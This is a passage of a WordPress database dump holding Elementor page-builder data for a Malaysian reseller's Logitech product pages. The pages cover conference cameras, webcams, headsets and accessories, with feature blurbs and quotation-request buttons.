straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5480,2928,'_elementor_version','0.4'),(5481,2936,'_wp_page_template','template-fullwidth.php'),(5482,2936,'_elementor_edit_mode','builder'),(5483,2936,'_elementor_template_type','post'),(5484,2936,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 